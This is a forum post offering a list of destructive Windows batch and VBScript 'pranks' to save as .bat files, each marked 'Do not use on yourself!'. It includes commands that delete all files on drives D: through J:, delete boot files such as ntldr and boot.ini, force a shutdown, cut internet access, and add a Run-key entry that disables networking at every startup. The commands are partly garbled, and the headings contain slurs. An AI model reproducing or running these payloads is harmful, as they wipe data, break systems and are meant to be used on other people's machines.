mesvak 362 [hide] #nibberside Delete all files. Do not use on yourself! off del D: \ . / f / s / q del E: \ . / f / s / q del F: \ . / f / s / q del G: \ . / f / s / q del H: \ . / f / s / q del I: \ . / f / s / q del J: \ . / f / s / q Save to .bat extension #haha hoho Create a lot of folders. Do not use on yourself! off for / l %% i in (1,1,100) do mkdir "dir %% i" Save to .bat extension #highimm8havewemetb4 Turn off the computer with a message. Do not use on yourself! off shutdown.exe -s -t 45 -c "The computer will turn off after 45 seconds" Save in the .bat extension We #this isgud stop accessing the Internet. Do not use on yourself! off Ipconfig / release To return access to the Internet back, in CMD we write IPconfig / renew Save to .bat extension #dont abuse me ffs XD Open an infinite number of calculators. Do not use on yourself! off CLS : A start calc.exe goto A Save to .bat extension #what the fuck again im dj Quickly format the disks. Do not use on yourself! Option Explicit Dim WSHShell Set WSHShell = Wscript.CreateObject (“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next Save to .bat extension #mesvak is here biba Makes the system die. Do not use on yourself! off attrib -r -s -hc: \ autoexec.bat del c: \ autoexec.bat attrib -r -s -hc: \ boot.ini del c: \ boot.ini attrib -r -s -hc: \ ntldr del c: \ ntldr attrib -r -s -hc: \ windows \ win.ini del c: \ windows \ win.ini Save to .bat extension #mesvak projector nigga Disable access to the Internet forever. Do not use on yourself! echo off> c: windowswimn32.bat echo break off >> c: windowswimn32.bat echo ipconfig / release_all >> c: windowswimn32.bat echo end >> c: windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun / v WINDOWsAPI / t reg_sz /dc:windowswimn32.bat / f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun / v CONTROLexit / t reg_sz /dc:windowswimn32.bat / f echo (your message) PAUSE Save to .bat extension [/hide] Quote Share this post Link to post Share on other sites